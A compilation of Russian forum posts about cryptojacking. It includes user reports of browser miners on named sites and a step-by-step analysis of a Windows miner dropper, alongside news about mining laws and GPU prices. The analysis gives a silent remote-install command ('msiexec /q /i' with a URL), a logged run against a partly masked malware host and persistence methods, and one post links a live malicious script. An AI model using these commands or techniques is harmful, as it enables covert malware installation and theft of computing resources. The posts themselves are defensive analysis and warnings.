О том, как я крипту зарабатывал... для других
Подыскивал я очередную ардуину... Захожу я на сайт mgbot.ru, который торгует всякой электроникой и появляется чувство некоторого торможения...
(для ленивых - /bitrix/js/main/core/core_loader.js с сайта в ~75% случаев подгружает майнер)
Проверяюсь - по SHIFT+ESC в Хроме есть свой диспетчер задач. Красота - все 4 ядра процессора почти целиком забиты полезной деятельностью, только мне немного оставили, чтоб казалось, что всё в порядке.
Полез к диспетчеру задач, может быть зря переживаю?
А нет... не зря... Ну что, лунная клизма призма, а нет, ИНСТРУМЕНТЫ РАЗРАБОТЧИКА (F12) дайте мне силы!
Наблюдаются непонятные процессы, которые у честных сайтов обычно отсутствуют в принципе. Как выяснилось - подгружается WASM сборка, которая делает что-то.
Знаем имя файла, можем на вкладке сети посмотреть - кто его вызвал. Какое чудесное имя вызывает эти странные нагрузки - crypta.js, а откуда оно появилось?
Файл crypta.js содержит исключительно не подозрительный текст (пжалте ссылочку - https://reauthenticator.com/lib/crypta.js?w=2028 ) . А вызывается это счастье из https://mgbot.ru/bitrix/js/main/core/core_loader.js?v=0.3.1, который скорей всего входит в типовой набор файлов сайта на битриксе, что как бы намекает, что бедный несчастный программист, живя впроголодь, решил немного обогатиться за счет работой-дателя и всех, у кого есть браузер, имевших несчастье попасть на сайт и дописал несколько строк.
Что же происходит внутри?
1. Случайное число до 4 выбирает, чем мы будем заниматься. Если 1 - то честная деятельность чего-то там, а вот 2-3-4, или если в воздухе повиснет - начинаем обогащать разные кошельки, если я правильно понял текст:
06d93b846706f4dca9996baa15d4d207e82d1e86676c
ef937f99557277ff62a6fc0e5b3da90ea9550ebcdfac
dd27d0676efdecb12703623d6864bbe9f4e7b3f69f2e
2. Подгружается JS-скрипт, который оглядывается в компьютере и начинает полезную деятельность.
Сохранил я этот файл на компьютере, отдал посмотреть VirusTotal, а он и говорит - всего-лишь подозрительное нечто, да и то по мнению только двух антивирусов.
https://www.virustotal.com/#/file/90c563eabc9347d722f65d80c7...
https://www.virustotal.com/#/file/3cc8131d6f631367a77d8e8f07...
Посмотрим на авторов crypta.js - сайт reauthenticator.com перекидывает на:
Кажется тут уже можно остановиться.
Мораль?
1. Программисты тоже бедные люди
2. Если сделал программист доброе дело, ты проверь и выкинь лишнее.
Авторам сайта извещение ушло. Кто хочет приобщиться к криптовалюте бесплатно без смс и установки дополнительных программ - заходите :)
Криптоджекинг. Разбор случайного вируса-майнера под Windows.
Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):
В автозагрузке, повторюсь всё в порядке:
После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.
Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):
В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:
Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:
И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:
Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:
Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:
Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:
Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:
Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:
Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:
Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:
Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:
Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:
Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:
Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":
Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).
Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.
Майнер hanstrackr в приложении Chrome
При открытии хрома веб отловил майнер в кэше браузера, но я еще не успел ничего открыть.
небольшие поиски привели меня в диспетчер задач и списку приложений и пара кликов показала связь между приложением блокировщика рекламы(который давно и спокойно работал) и субфреймом hanstrackr.
Будьте внимательны.
В Госдуму внесён законопроект о криптовалютах: майнеров заставят зарегистрироваться как ИП
20 марта 2018 года депутаты Государственной Думы А.Г.Аксаков, И.Б.Дивинский, О.А.Николаев, Р.М.Марданшин, а также член Совета Федерации Н.А.Журавлёв представили законопроект № 419059-7 «О цифровых финансовых активах» http://sozd.parlament.gov.ru/bill/419059-7
Цели законопроекта следующие: законодательное закрепление в правовом поле определений криптовалюты, токена, распределённого реестра цифровых транзакций (блокчейна) и смарт-контракта; создание правовых условий для привлечения юрлицами и ИП инвестиций путём выпуска токенов.
Согласно законопроекту, и криптовалюта, и токен являются имуществом. Прямо устанавливается, что цифровые финансовые активы не являются законным средством платежа на территории Российской Федерации.
Кроме того, майнинг признаётся предпринимательской деятельностью в случае, когда лицо, которое его осуществляет, в течение трёх месяцев подряд превышает лимиты энергопотребления, установленные правительством РФ.
Законопроект закрепляет правовые основы для осуществления майнинга и валидации цифровых транзакций (деятельность по подтверждению действительности цифровых записей в распределённом реестре цифровых транзакций).
Цифровое имущество (токены и криптовалюту) можно обменивать на рубли или иностранную валюту. При этом возможность обмена, а также порядок и условия обмена будут определяться Банком России по согласованию с Правительством РФ. Все сделки должны осуществляться через операторов обмена цифровых финансовых активов, которыми могут быть только юридические лица, созданные в соответствии с законодательством. Сделки должны осуществляться в соответствии с Правилами организованных торгов цифровыми финансовыми активами, зарегистрированными в Центральном банке Российской Федерации.
Цифровые записи, содержащие информацию о таких сделках, будут храниться в цифровых кошельках, открытых сторонам сделки оператором обмена цифровых финансовых активов. Порядок открытия, хранения информации о цифровых записях, ведения, закрытия цифрового кошелька, а также требования к защите цифровых кошельков устанавливаются Центральным банком Российской Федерации.
Особое место в законопроекте занимает статья, которая устанавливает правовые основы для проведения ICO. Эта статья устанавливает последовательность действий, необходимых для ICO, определяет состав обязательной публичной оферты и закрепляет необходимость раскрытия дополнительной информации лицом, выпускающим токены.
Публичная оферта о выпуске токенов должна быть подписана усиленной квалифицированной электронной подписью лица, осуществляющего функции единоличного исполнительного органа юридического лица – эмитента или индивидуального предпринимателя – эмитента.
Для защиты неквалифицированных инвесторов (обычных граждан) законопроект наделяет Банк России полномочием по установлению ограничения в отношении суммы приобретения токенов такими лицами. Предполагается, что участвовать в ICO смогут неквалифицированные инвесторы с суммой вложений до 50 тыс. руб.
Сейчас законопроект направлен для рассмотрения в комитет Госдумы по финансовому рынку. Срок представления отзывов, предложений и замечаний истекает 3 апреля 2018 года. Предположительно в апреле он будет вынесен для рассмотрения Госдумой.
После принятия закона потребуется внести ряд подзаконных актов, а также изменения в административный и уголовный кодекс для лиц, нарушающих закон. Например, уголовная ответственность за незаконный оборот денежных суррогатов может составить до четырёх лет лишения свободы.
Майнеры, которые не зарегистрируются в качестве индивидуальных предпринимателей, будут привлечены к ответственности за незаконную предпринимательскую деятельность по статье 171 УК РФ, которая наказывается штрафом до 300 тыс. руб. или обязательными работами на срок до 480 часов, или арестом на срок до 6 месяцев. То же деяние, совершённое группой или сопряжённое с извлечением дохода в особо крупном размере наказывается штрафом до 500 тыс. руб. или принудительными работами на срок до 5 лет или лишением свободы на срок до 5 лет со штрафом.
Сейчас предложения по потреблению майнерами электроэнергии и их возможной ответственности готовит Минкомсвязи. По словам экспертов, вычислить майнеров очень легко по круглосуточному профилю потребления электроэнергии.
Статья на ГТ https://geektimes.ru/post/299271/
В «Борисполе» задержали крупную партию устройств для майнинга криптовалюты
Таможня добро не дает, а берет
Сотрудники Киевской таможни задержали в аэропорту "Борисполь" крупную партию ASIC-устройств для майнинга криптовалют на сумму 13 млн гривен.
Об этом проинформировали в Государственной фискальной службе Украины.
"В зоне деятельности таможенного поста "Борисполь-аэропорт" в рамках реализации аналитическо-поисковых мероприятий обнаружена схема незаконного перемещения через таможенную границу Украины крупной партии устройств для так называемого майнинга (добычи ) криптовалюты. Груз следовал в адрес отечественного субъекта внешнеэкономической деятельности авиатранспортом", - сказано в сообщении.
Отмечается, что правонарушители приобрели дорогостоящее оборудование на территории Гонконга и пытались переместить товар через таможенную границу Украины, предоставив документы, содержащие ложные сведения о стоимости товара.
Вследствие указанной незаконной сделки госбюджет Украины мог потерять миллионы гривен.
По данному факту открыто административное дело о нарушении таможенных правил (по ст. 483 Таможенного кодекса Украины).
"200 указанных приборов весом нетто 950 кг изъяты до вынесения судом решения по делу. Минимальная стоимость изъятой партии товаров (согласно информации на сайте гонконгского производителя) составляет в эквиваленте 13 млн гривен", - уточнили в ГФС.
видео: http://sfs.gov.ua/data/video/000/003/4376/video1.mp4
http://sfs.gov.ua/media-tsentr/videogalereya/borotba/4376.ht...
http://sfs.gov.ua/media-tsentr/mitni-novini/325116.html
https://miningclub.info/threads/v-borispole-zaderzhali-krupn...
https://bykvu.com/bukvy/84410-v-borispole-zaderzhali-krupnuy...
Майнер-ролл "Две Палочки"
В продолжение к этому посту: https://pikabu.ru/story/mayneryi__mayneryi_povsyudu_5613455
Если зайти на сайт официальной доставки "Две Палочки" (заходите на свой страх и риск и лучше иметь при этом антивирус): http://dostavka.dvepalochki.ru/ , то получаем на свой комп майнера:
Хорошо антивирь стоит, а то так бы майнил бы уже. Вот так, захотите заказать еды в приличном месте, а на вас еще и подзаработают. Не знаю, в курсе ли сами Две Палочки, но такие дела.
Пикабу жрет процессор, 100% CPU
Если оставить вкладку с новым Пикабу на некоторое время, ноутбук начинет шуметь. У вас там майнер что ли? )
Майнеры Coinhive обнаружены в Android-приложениях и на WordPress-сайтах
Gifx
Начиная с сентября 2017 года мы наблюдаем за явлением, которое получило имя криптоджекинг (cryptojacking). Суть криптоджекинга предельно проста: в код сайтов внедряют специальные скрипты, которые конвертируют мощности CPU посетителей ресурса в криптовалюту. Фактически, это просто майнинг через браузеры.
Проблема заключается в том, что владельцы сайтов далеко не всегда встраивают майнинговые скрипты в код своих ресурсов добровольно, чаще сайты подвергаются взлому с этой целью. К тому же, даже если майнер не был установлен насильно, третьей стороной, сами владельцы сайтов тоже крайне редко предупреждают о происходящем посетителей и не предоставляют им возможности отключения майнеров.
Как мы уже рассказывали ранее, все это вызывает крайне негативную реакцию у ИБ-специалистов. К примеру, компания Cloudflare уже начала блокировать такие ресурсы и пояснила, что расценивает действия владельцев таких сайтов как вредоносные.
Пользователям, в свою очередь, рекомендуется не пренебрегать антивирусными продуктами и блокировщиками рекламы, которые блокируют работу скриптов. Также уже появились специальные «противомайнинговые» расширения для браузеров: AntiMiner, No Coin, и minerBlock. Плюс пользователь всегда может просто отключить Javascript самостоятельно или установив соответственные расширения для браузера (к примеру, NoScript и ScriptBlock).
Однако осуждение со стороны ИБ-сообщества, похоже, мало тревожит операторов майнинговых сервисов и их клиентов. Наиболее популярным в настоящее время является сервис Coinhive, у которого уже появилось немало подражателей, число которых продолжает расти. Недавно специалисты даже запустили специальный сайт WhoRunsCoinhive, на котором можно проверить, какие ресурсы используют скрипты Coinhive. Но проблемными теперь могут оказаться не только сайты.
Сегодня 30 октября 2017 года, специалисты Trend Micro и вовсе сообщили, что им удалось обнаружить майнинговые скрипты в составе трех приложений для Android. Причем приложения Recitiamo Santo Rosario Free и SafetyNet Wireless App были свободно доступны в официальном каталоге Google Play. Очевидно, все проверки безопасности Google не сумели обнаружить, что программы запускают майнера в фоновом режиме, с помощью WebView.
Также специалисты обнаружили в Google Play третье приложение, Car Wallpaper HD: mercedes, ferrari, bmw and audi, которое не задействовало WebView, но использовало библиотеку CpuMiner, то есть майнило даже без открытия браузера.
Исследователи Trend Micro с тревогой отмечают, что приложениям не нужно запрашивать никаких дополнительных разрешений для такой активности, а сама работа майнера может провоцировать перегрев устройства, значительно сокращать «срок жизни» батареи и, разумеется, сказываться на производительности девайса.
Еще одно неприятное известие поступило от аналитиков компаний Sucuri и Wordfence, которые зафиксировали вредоносную кампанию, направленную против сайтов на базе WordPress (а также Magento, Joomla и Drupal). По данным Sucuri , неизвестные злоумышленники из одной группировки скомпрометировали уже более 500 ресурсов. Попав на такой сайт, пользователи Firefox видят классическое поддельное сообщение, гласящее, что им срочно необходимо установить новый набор шрифтов. А пользователям Chrome, в свою очередь, приходится иметь дело с обфусцированной и сильно видоизмененной версией Coinhive.
Adguard для Google Chrome умеет обнаруживать майнеры на сайтах
Зашел на местный новостной сайт.
Увидел вот это.
Спасибо AdGuard. У меня все.
А Яндекс Браузер оказывается не так уж и плох
P.S. ну и жлобы же на кинокраде
Путь от гуманитария к технарю.
Я очень везучий человек, рядом с которым все ломается и идет по женскому детородному органу. Поэтому, когда я получила в пользование новенький, долгожданный, не самый крутой, но достаточно неплохой ноут HP, тут же, качая необходимые проги (кому вру, игры я качала), словила рекламный вирус. Это та херня, которая в любое время работы открывает вкладку в браузере и начинается "НИНА ШО ЗА ЖОГАЗИНА". По советам, я накачала кучу антивирусников, типа Dr. Web, Касперского и тому подобных. Каждый из них, конечно, находил "каку", удалял, но, стоило перезагрузить ноутбук, эта дрянь множилась и восстанавливалась.
В какой-то момент я забила и стала жить так. Но, как оказалось, терпение у меня ни к черту. Гугля я не находила дельных советов, антивирусники по-прежнему не спасали, а нервы уже крошились. Не найдя выхода, я решила попробовать еще какой-нибудь антивирус или клинер. Загуглила лучшие бесплатные антивирусники и нашла 360 Total Security. Ни на что особо не надеясь, скачала, установила, запустила проверку. Он, как и все остальные, нашел заразу, почистил и попросил перезагрузиться, что я и сделала. Когда компуктер включился, я уже ждала, что сейчас опять он начнет требовать у меня Нину, как на новом купленном номере коллекторы требовали у меня Викторию. Но ни через минуту, ни через час, ни через месяц этого не случилось. Не знаю какой магией и молитвами этот шайтан вылечился, но я очень люблю технологии.
Через месяца четыре ноутбук стал очень греться и шуметь. Я поняла, что его стоит почистить и поменять термопасту. Но так как гарантия еще действовала, я решила, что, когда поеду домой (учусь в другом городе), отнесу его по гарантии. Тем временем ноутбуку становилось хуже, при просмотре видеозаписей в сети он начинал вистунь на несколько секунд и делать жуткое "прррррррунь", а на видео в ютубе внизу появились две небольших линии черного и зеленого цвета. Иногда они были достаточно длинные, но чаще стояли в уголке себе. Связи я не видела, но это иногда раздражало.
Дома, не найдя гарантии, я купила термопасту, просмотрела несколько обучающих видео и принялась за работу. Только, как оказалось, на моем ноутбуке не небольшая крышечка сзади, которая довольно легко снимается. А снимать надо весь корпус. Я тянула, грызла, ковыряла, но ничего не выходило. Кое-как все-таки нашла видео, как снимается крышка с ноута модели, типа моей. Англоязычный профэссиональ абисняет, ведет пластмассовым огрызком по краям крышки, она делает "чпок", а мистер, показывая, говорит что все изи.
У меня же никакого чпока и я в сердцах вопрошаю сенсея, что нихуя не изи, повтори еще.
В итоге все-таки получилось. Открыв врата непонятной для меня херни, я увидела вещи, похожие на те, что и в видео. Все сделала по рекомендациям. Но меня удивило, что пыли в вентиляторе было почти ничего, а термопасты старой было с избытком. Но надежда, как говорится, умирает. Включив ноут, я поняла, что если изменения и есть, они очень мизерные. Так как ноутбук не то что грелся дико во время игры, но и во время простого сёрфа по просторам шумел, как будто 200га один копает.
Я уже было смирилась с тем, что придется нести моего друга к какому-нибудь дяде, который не факт, что не наебет бедную студентку, так еще и ковришек, отложенных на дошик, сдерет в три раза больше, чем надо. Но тут совершенно случайно натыкаюсь на пикабу на историю о майнерах и их вредоносных возможностях. Я, как человек любознательный, начала гуглить рецепты майнеров в собственном соку и, читая их поведенческие особенности на компах, поняла, что словила заразу, похуже микробов под ободком унитаза (а как гласит реклама, они очень опасные). В общем. Найдя через диспетчер задач жуткую жуть, что нагружала комп почти на сотку и все везде снеся, пройдясь по ноуту несколькими антивирусниками и перезагрузив, я обнаружила, что и дышать легче и можно, наконец, запустить Bless Online без страха, что эти шайтан технологии разнесут моего беднягу в клочья. И, кстати, те странные линии с видео на ютубе тоже пропали.
В общем, хочу обратиться к сведущим людям в этих всяких макических делах. Пожалуйста, напишите понятные туториалы для таких лошар, как я, по избавлению от всякой нечисти. Особенно, от этих новомодных майнеров.
А я, как абсолютный гуманитарий, пойду дальше играться в корейские ммо писать статейки для своей практики.
P.S. Мне уже можно давать на авито объявления по профессиональному ремонту ноутбуков?
P.P.S. Что все-таки это были за линии на ютубе?
P.P.P.S. У меня нет фоток сисек, поэтому вот вам моя киска.
Майнер на professorweb.ru.
Сижу спокойно на работе, никого не трогаешь. Вдруг слышу, что ноутбук сильно зашумел. Ни о чем не подозревая открываю диспетчер задач и вижу там следующую картину:
Очень странно. Лезу в браузер, дабы понять причину этой несправедливости. Подозрительных вкладок не наблюдается. Начинаю закрывать по одной и после закрытия этой:
ноут с облегчением замолкает. Для того, чтобы удостовериться, повторяю эксперимент в другом браузере:
Gifx
С тем же результатом. Лезу в код сайта и вижу там следующую картину:
Гуглинг показывает, что coin-hive - сервис для майнинга Monero при помощи JS. Пруф:
То есть чуваки никому ни слова не говоря воткнули майнер в код своего сайта. Ну или это сделал кто-то за них. Отсюда возникает вопрос: совесть у вас есть?
Наступают худшие времена для покупки видеокарт в игровых целях — спасибо, майнеры
В этом месяце цена на видео-память подскочила на 30% и судя по всему, она продолжит расти и в сентябре, мотивируя рост и самих видеокарт... Впрочем, учитывая спрос со стороны проклятых майнеров, ритейлерам не нужны причины, чтобы задирать цены на видеокарты. Более, того, ходят разговоры, что AMD сама повышает цену на серию карт RX Vega, хотя в игровых тестах ока показывает себя не лучше GTX 1080, а где-то даже хуже.
Взрыв рынка домашнего майнинга в конце весны привел к тому, что стало практически невозможно купить видеокарты AMD на чипе Polaris 400 и 500 серий... по крайней мере по адекватной цене.
На этой неделе состоялся релиз AMD RX Vega в Москве уже невозможно найти по адекватной цене. Быстрый поиск выдает, что минимальная цена на RX Vega 64 в столице составляет 52 500 рублей или $890. То есть, почти в два раза дороже, чем заявляла AMD.
Более того, на днях выяснилось, что цена на RX Vega 64 в $500 — это стоимость со скидкой. Также AMD объясняет, что рост цен связан с нехваткой видеокарт... и это после того, как они убеждали нас, что задержка Vega связана с намерением AMD обеспечить спрос, в том числе и майнеров.
AMD фактически заставляет геймеров идти на покупку более дорогих "наборов" с AMD RX Vega 64, включающих игры, скидки и прочий хлам, который может быть ненужен для большинства геймеров.
Тем временем Samsung и SK Hynix — компании, производящие 90% графической памяти, переключили часть мощностей на производство RAM для серверов и мобильных телефонов. Это ведет к повышению цен на VRAM и могут вырасти еще значительней к октябрю.
Бешеные майнеры, PR-махинации AMD, рост цен на VRAM — шикарно живем.
Источник.
Житель Екатеринбурга объявил о продаже 30 ферм для промышленного майнинга. Владелец оценил «золотые прииски» в 11 миллионов рублей.
Объявление размещено на сайте Avito 2 августа. Основная валюта фермы — не биткоины, майнить которые уже поздно. 12 ферм ориентированы на добычу «эфира» (Ethereum) и 18 — на «зикеш» (Zcash). Сейчас эти валюты торгуются на рынке по 16,6 и 12,8 тысячи рублей.
Все 30 ферм владелец разместил в контейнере с уже установленной приточно-вытяжной вентиляцией. В объявлении указано, что все оборудование отправится к новому хозяину вместе с контейнером.
За 11 миллионов рублей в том же Екатеринбурге можно купить хорошую (большую!) трех- или четырехкомнатную квартиру.
Что думаете?
Майнеры принесли NVIDIA и AMD почти миллиард долларов прибыли.
Пока майнеры паникуют из-за падения курса криптовалют, NVIDIA и AMD подсчитывают прибыль от продажи своих видеокарт. По информации Bloomberg, за второй квартал этого года дополнительная выручка компаний на фоне «майнингового бума» составит около 875 миллионов долларов
Как отмечают специалисты, эта сумма приблизительно равна выручке AMD от продажи видеокарт за весь прошлый год, а для NVIDIA это — половина квартальной выручки. Однако 875 миллионов — лишь предварительная сумма, окончательные финансовые результаты второго квартала компании представят в отчетах 25 июля
NVIDIA никак не прокомментировала дополнительные доходы от криптовалютного рынка, а вот представители AMD заявили, что, несмотря на сложившуюся ситуацию, «приоритетным рынком для компании остается игровой»
Как я поймал и обнаружил скрытый майнер
Всем привет. Вот и я решил зарегаться дабы поведать Вам одну историю которая произошла со мной на днях. Давеча сидел я вечером в одной своей любимой игре, играл и тут заметил, что игра довольно сильно местами лагает. Да ладно, видно опять не прогрузились текстуры полностью подумал я. Доиграл и уже было собирался спать, вышел из игры и через 5 минут заметил, что куллер на процессоре не сбавляет обороты. Странно, комп в простое, никаких прог использующих проц у меня нет. Как и любой другой пользователь открыл я диспетчер задач и увидел лишь нагрузку в пару процентов, но мой внутренний голос говорил мне, что-то здесь не то. Открываю аиду и вижу нагрузку на два ядра в 100%, открываю диспетчер задач, нагрузки нет, а в аиде она падает до нуля. Тут я понимаю, что словил скрытый майнер. Откуда я это понял? Когда-то интересовался этой темой, конечно не обошлось без разных форумов где видел продаванов предлагающих свои приватные сборки среди функций которых были и такие как скрытие от диспетчера задач, восстановления майнера после удаления. То есть при запуске диспетчера задач процесс майнера закрывался, а пользователь увидев, что нет никакой нагрузки, закрывал диспетчер и даже не подозревал, что после этого майнер снова начинал свою работу. И так нужно было остановить майнер и временно локализировать его пока я не вывел заразу с компа. А для этого его надо найти. Обычный диспетчер не помогает увидеть процесс майнера, процесс хакер тоже поскольку это диспетчер номер один после стандартного. Обычно создатель майнера задает ему завершение работы только при запуске стандартного диспетчера и парочки сторонних популярных. Я использую еще один диспетчер, System Explorer, отличная шутка. Запустив его я сразу глянул в аиду, нагрузка не упала, значит этот диспетчер майнер не палит. Просмотрев процессы я увидел, что комп мой грузит процесс helper.exe, бегло посмотрев в инете, что это файл винды на запуск доверенных программ, я открыл подпроцессы этого процесса и обнаружил еще один с абракадаброй в названии и расширением .tmp, то есть временный файл, немного удивил тот факт, что именно он грузил проц когда я открыл всю ветку. После его убийства я не удивился, что создался и запустился другой tmp-шник и тут же дал нагрузку на проц. Открыв папку с файлом helper я увидел пустоту, быстро сообразив, что раз скрытые папки и файлы включены, а файла я не вижу, значит у него атрибут системного. Быстренько создав батник и прописав в нем attrib -s -h до пути файла я его наконец увидел, затем убил процесс и тут же удалил, куллер потихоньку начал снижать обороты, нагрузка упала, далее пришлось возиться со скриптами в AVZ и на всякий случай просканить комп одноразовым сканировщиком. Удаляя этот файл я мельком увидел, что дата его изменения две недели назад, а винда стоит давно, вероятно он был подставлен вместо оригинально хелпера винды или просто так назывался дабы не вызвать подозрений. Надеюсь я снес все, но с тех пор веду круглосуточный мониторинг и все тихо. Кто-то скажет "надо вовремя обновлять базы данных антивируса", но не забывайте, что многие антивирусы не распознают простенький майнер как вирус, так как он не вредит компьютеру, а лишь заимствует его ресурсы для своих нужд. А если это еще и грамотно сделанный майнер и хорошо закриптованный, то антивирусы не спалят его вообще в ближайшие 2-3 недели начиная с момента сборки. Видеокарту майнер не задел, видно майнил только на проце. На этом все, берегите свое железо от недобросовестных майнеров.
